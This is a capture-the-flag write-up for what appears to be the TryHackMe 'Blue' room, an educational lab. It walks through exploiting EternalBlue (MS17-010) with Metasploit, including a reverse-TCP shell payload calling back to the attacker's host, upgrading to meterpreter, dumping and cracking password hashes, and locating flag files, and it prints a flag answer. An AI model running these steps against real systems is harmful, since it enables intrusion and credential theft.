THM Blue Write Up
Background - Blue is a great machine to get to familiar with EternalBlue (CVE-2017–0144).
The room’s description says that it doesn’t respond to ping ICMP packets but if we try to ping,
it works and we get reply back. Since it’s a Windows box weird things happen.
Reconnaissance
Lets follow the traditional method, Lets scan the machine.
Type this command -
nmap -sV -sC -A machinesip
What does this command do?
- -sV : This flag used to enumerate versions.
- -sC : Performs a script scan using the default set of scripts. It is equivalent to
--script=default
- -A : This flag is used to Enable OS detection, script scanning and version detection.
We got this
Ok we saw that there are 3 ports are open with a port number under 1000.
What is the machine vulnerable to?
Hint : -
After googling I found this, it is
ms17_010_eternalblue
Access
To gain access to the machine we run metasploit, to start the metasploit type
msfconsole
The exploitation code which we will run against the machine is exploit/windows/smb/ms17_010_eternalblue.
Now we will use this exploit by entering the command
use exploit/windows/smb/ms17_010_eternalblue
and we type show options to set the required values.
RHOSTS is the required value
Now lets exploit the machine, for this we just need to set the payload, RHOST, LHOST.
Type
set payload windows/x64/shell/reverse_tcp set RHOST machine ipset LHOST your machine ip
Ok now we are good to go. just type exploit or run to exploit the machine
Yay, we successfully exploited the machine.
Escalate
Lets start escalating the privileges, for this lets background this session by ctrl+Z. Lets convert a shell to meterpreter shell in metasploit.
Type
use post/multi/manage/shell_to_meterpretershow options
Now we can see that SESSION is the required option to set. For this, type sessions -l to see how many sessions are opened.
Now we need to set the session id and exploit. For this just type
set SESSION 1
and run it. Now we successfully completed the post module execution.
Cracking
Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the hashes on the machine as long as we have the correct privileges to do so.
hashdump
The name of the non default user is Jon.
Now copy this
and crack it online.
yay, we got credientials.
Here comes the main part {FLAGS}
For flags just type shell in meterpreter.
Now you should search for the flags. For this just change your directory to
C:\ . Then type this command to search the files containing flags.
dir *flag*.txt /s
Yay, we found the flags, now just cat this file.
15ae4d7b4081407aa462768c5056c6e0
Thanks for scrolling down.
Rithvik Reddy.